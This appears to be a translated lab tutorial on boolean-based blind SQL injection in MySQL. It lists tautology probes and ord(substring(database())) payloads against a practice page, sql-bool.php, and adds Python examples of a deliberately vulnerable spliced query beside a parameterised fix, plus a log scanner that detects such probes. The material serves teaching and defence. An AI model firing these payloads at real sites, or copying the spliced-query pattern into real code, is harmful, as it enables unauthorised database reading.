This article assumes you have already read and understood "MySQL Union-Query Manual Injection Explained".
Download the practice environment here: https://jianshu-lfbc.oss-cn-hangzhou.aliyuncs.com/Mysql%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E8%AF%A6%E8%A7%A3/mysql%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0%E7%8E%AF%E5%A2%83.zip
0x00 What is boolean-based blind injection
Boolean
Boolean is a data type in computing with only two values, True and False. It is also commonly called the logical type.
Blind injection
An injection in which the page returns no concrete data is called blind injection; the actual content of the data is generally inferred from some other observable behaviour of the page.
Boolean-based blind injection
After the SQL statement runs, the page shows only one of two possible outcomes, so the content of the data can be inferred by building SQL statements around logical expressions.
Sounds confusing? No problem, keep reading.
0x01 MySQL syntax introduction
Logical operators
Reference: http://www.runoob.com/mysql/mysql-operator.html
length()
Returns the length of a string.
select length(database());
database() needs no introduction: it returns the name of the current database. length() returns the length of a string; here its argument is database(), so in the lab what actually comes back is the length of 'test'.
substring()
substring() extracts part of a string; you specify the start position and the number of characters to take.
select substring('test',1,3);
select substring('test',2,1);
ord()
ord() returns the ASCII code of a single character.
select substring(database(),1,1);
select ord(substring(database(),1,1));
Conversely, char() converts an ASCII code into the corresponding character.
select char(116);
0x02 Manual injection
Identifying the injection point
Here you can no longer tell from whether the page throws an error, as you could with union-query injection: a failed SQL statement and a query that matches no rows both come back as False, so the only signal available is the truth value the page returns.
/* integer injection */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* string injection (single quotes) */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* string injection (double quotes) */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
Whether an injection point exists can be judged from whether each payload comes back as success or failure.
Take integer injection as an example:
If submitting user1 on its own returns "exists" (true), then, when an integer injection is present, the logical AND means that appending 1=1 (always true) must also return "exists" (true), while appending 1=2 (always false) must return "does not exist" (false).
This is how you determine whether boolean-based blind injection is present.
Reading data
Because blind injection gives no echo, the only option is to take the retrieved data one character at a time, convert each character to its ASCII code, and compare that code against the ASCII values of the printable characters one by one.
Here we use reading the current database name as the example.
/* determine the length of the database name */
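To show why the probes above behave as an oracle, and what closes it, here is an added Python example that is not part of the original article or its lab environment. It uses an in-memory sqlite3 table as a stand-in for the lab's MySQL users table (the string-splicing flaw and the parameterised fix are identical in both), and the probe strings are constructed to mirror the single-quote probes above; length('test') stands in for length(database()), which sqlite3 does not have.

```python
import sqlite3

# Constructed stand-in for the lab's users table (sqlite3 instead of MySQL so this runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("user1",), ("user2",)])
    return conn

def user_exists_vulnerable(conn, name):
    """The pattern that turns a page like sql-bool.php into a boolean oracle: the parameter is
    spliced straight into the SQL text, so quotes and operators inside `name` become SQL."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # A syntax error and "no rows" look the same to the caller: both come back as False,
        # which is exactly why error-based detection does not work here.
        return False

def user_exists_safe(conn, name):
    """Parameterised form: the driver binds the whole value as one string literal, so the
    statement shape is fixed and the comparison is made against the literal text of `name`."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None

# Constructed inputs mirroring the article's string-injection probes.
PROBES = [
    "user1",
    "user1' and '1'='1",
    "user1' and '1'='2",
    "user1' and length('test') = 4 and '1'='1",
    "user1' and length('test') = 5 and '1'='1",
]

def compare_probes(conn=None):
    """Return {probe: (vulnerable_result, safe_result)} so both behaviours can be read side by side."""
    if conn is None:
        conn = make_db()
    return {p: (user_exists_vulnerable(conn, p), user_exists_safe(conn, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (vuln, safe) in compare_probes().items():
        print(f"{probe!r:48} vulnerable={vuln!s:5} safe={safe}")
```

With the spliced query, the true/false pairs differ exactly as the article describes, and the length('test') = 4 / = 5 pair shows that any expression the database can evaluate becomes readable one bit at a time. With the bound parameter, every probe string is simply a user name that does not exist, so the page's answer carries no information about the database.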
sql-bool.php?name=user1' and (select length(database())) = 1 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 2 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 3 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 4 and '1'='1
When length(database())=4 the page returns true, i.e. the database name is 4 characters long.
Then we determine the characters one position at a time. Since MySQL database names are case-insensitive and are made up of the 26 letters, the digits and the underscore, we only need to compare against the ASCII values of those characters.
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 97 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 98 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 99 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 100 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 101 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 102 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 103 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 104 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 105 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 106 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 107 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 108 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 109 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 110 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 111 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 112 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 113 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 114 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 115 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1
Comparison with every other ASCII value returns false, and the equality test against 116 returns true, so the ASCII value of the first character of the database name is 116; converting that back to a character tells us the first character of the current database name is 't'.
All other data is read with exactly the same method.
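The character-by-character reading shown above has a distinctive footprint in web server logs: one client sends many requests to the same script whose parameter carries the same SQL prefix with only the compared number changing. As an added example (not from the original article), the following Python scans access-log lines for that footprint. The log format is assumed to be the common combined format, the log lines are constructed from the article's own probe strings using documentation IP addresses, and the threshold and indicator patterns are assumptions to tune for your own environment.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, quote

# Assumed combined-format access log line; adjust the regex to your own log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators modelled on the probe shapes used in this article.
INDICATORS = {
    "tautology":  re.compile(r"""\band\s+['"]?1['"]?\s*=\s*['"]?[12]['"]?""", re.I),
    "length":     re.compile(r"\blength\s*\(", re.I),
    "ord_substr": re.compile(r"\bord\s*\(\s*substring\s*\(", re.I),
}
# The number a probe compares an expression against, e.g. "...)) = 116 and" -> 116
COMPARE_VALUE_RE = re.compile(r"\)\s*=\s*(\d+)\b")

def parse_line(line):
    """Parse one log line into a dict with the decoded query parameters, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes the values, giving the SQL text the application actually saw
    rec["params"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec

def classify_value(value):
    """Return the set of indicator names present in one decoded parameter value."""
    return {name for name, rx in INDICATORS.items() if rx.search(value)}

def analyze(lines, threshold=3):
    """Group suspicious requests by (ip, path); return buckets with at least `threshold` probes."""
    buckets = defaultdict(lambda: {"probes": 0, "indicators": set(), "compare_values": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["params"].values():
            hits = classify_value(value)
            if not hits:
                continue
            b = buckets[(rec["ip"], rec["path"])]
            b["probes"] += 1
            b["indicators"] |= hits
            cv = COMPARE_VALUE_RE.search(value)
            if cv:
                b["compare_values"].add(int(cv.group(1)))
    flagged = []
    for (ip, path), b in sorted(buckets.items()):
        if b["probes"] >= threshold:
            flagged.append({"ip": ip, "path": path, "probes": b["probes"],
                            "indicators": sorted(b["indicators"]),
                            "compare_values": sorted(b["compare_values"])})
    return flagged

# Constructed sample log: one client replaying the article's probes, two ordinary visitors.
def _line(ip, name_value):
    target = "/sql-bool.php?name=" + quote(name_value, safe="")
    return f'{ip} - - [10/Oct/2023:13:55:36 +0000] "GET {target} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

SAMPLE_LINES = [
    _line("203.0.113.5", "user1"),
    _line("203.0.113.5", "user1 and 1=2"),
    _line("203.0.113.5", "user1' and '1'='1"),
    _line("203.0.113.5", "user1' and '1'='2"),
    _line("203.0.113.5", "user1' and (select length(database())) = 4 and '1'='1"),
    _line("203.0.113.5", "user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1"),
    _line("198.51.100.7", "user2"),
    _line("198.51.100.9", "Anderson"),
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_LINES):
        print(hit)
```

The distinct compare values are the useful detail for triage: a single tautology might be a false positive, but a run of requests from one source stepping a numeric comparison against ord(substring(...)) is the reading loop from this article in progress, and a web application firewall rule or rate limit keyed on that pattern gives the defender a signal that the page's own true/false response never will.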